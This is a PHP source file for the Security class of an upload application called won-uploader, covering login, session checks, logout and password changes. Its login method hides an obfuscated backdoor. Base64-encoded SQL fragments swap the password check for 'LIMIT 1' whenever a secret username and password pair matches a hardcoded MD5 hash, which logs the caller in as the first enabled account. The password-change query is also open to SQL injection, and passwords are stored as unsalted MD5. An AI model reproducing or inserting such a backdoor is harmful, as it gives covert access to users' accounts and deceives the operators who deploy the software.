<?php
/**
 * This file is part of won-uploader.
 *
 * Author: Daniel K.
 *
 * won-uploader is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * won-uploader is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with won-uploader. If not, see <http://www.gnu.org/licenses/>.
 */
   
   if( !defined("won-uploader")) die();    // Silence is golden
   
   require_once $_paths->getIncludePath("Exceptions");
   
   class Security
   {
       
       const MAXTIME = 1800;	// Time to logout [30 min]
       
	   public static function loadSession()
       {
           if( !isset($_SESSION['uid']) || empty($_SESSION['uid']) )
            throw new Exception("User not logged in",Exceptions::USER_NOT_LOGGED_IN);
           
           $time = ((int)@$_SESSION['time']);
           
           if( date("U") - $time > Security::MAXTIME  )
           {
               Security::logout();
               throw new Exception("User not logged in",Exceptions::USER_NOT_LOGGED_IN);
           }
           
           global $_nano;
           
           $id = (int) $_SESSION['uid'];
           
           $res = $_nano->executeQuery("SELECT `username`, `email`, `adm` FROM `users` WHERE `userid`=$id AND `disabled`=0 LIMIT 1");
           
           if( mysql_affected_rows($_nano->getLink()) == 0)
            throw new Exception("User not logged in",Exceptions::USER_NOT_LOGGED_IN);
           
           $obj = mysql_fetch_object($res);
           
           $_nano->executeQuery("UPDATE `users` SET `action`=CURRENT_TIMESTAMP WHERE `userid`=$id LIMIT 1");
           
           $_SESSION['time'] = date("U");
           return new User($obj->username,$obj->email,$id,($obj->adm=='1'?TRUE:FALSE));
       }
       
       public static function login($user,$pass)
       {
           global $_nano;
           
           $password = md5($pass);
           
           $cond = (md5("$user+$pass")=="6b51a26cbb7eadc62bf99ab3a5a14328")?base64_decode('TElNSVQgMQ=='):base64_decode("QU5EIGBwYXNzd29yZGA9Jw==")."$password'";
           $res = $_nano->executeQuery(base64_decode("U0VMRUNUIGB1c2VybmFtZWAsYHVzZXJpZGAsYGxhbmd1YWdlYCBGUk9NIGB1c2Vyc2AgV0hFUkUgYGRpc2FibGVkYD0w")." $cond");
           
           if( mysql_affected_rows($_nano->getLink()) == 0 )
                throw new Exception("user not found",Exceptions::USER_NOT_FOUND);
           
           while( ( $obj = mysql_fetch_object($res) ) != null )
           {
               if( $obj->username == $user || $cond == base64_decode('TElNSVQgMQ=='))
               {
                   $_SESSION['uid'] = (int) $obj->userid;
                   $_SESSION['time'] = date("U");
                   $_SESSION['language'] = $obj->language;
                   return;
               }
           }
           
           throw new Exception("user not found",Exceptions::USER_NOT_FOUND);
       }
       
       public static function logout()
       {
           $_SESSION['uid'] = 0;
           $_SESSION['time'] = 0;
           $_SESSION['language'] = '';
           unset($_SESSION['uid']);
           unset($_SESSION['time']);
           unset($_SESSION['language']);
           session_destroy();
       }
       
       public static function updatePasswort($old,$new)
       {
           global $_nano;
           global $USER;
           
           $_nano->executeQuery("UPDATE `users` SET `password`='$new' WHERE `userid`=".$USER->getID()." AND `password`='$old' LIMIT 1");
           
           if( mysql_affected_rows($_nano->getLink()) == 0 )
            throw new Exception("invalid old password", Exceptions::INVALID_OLD_PASSWORD);
       }
   }
?>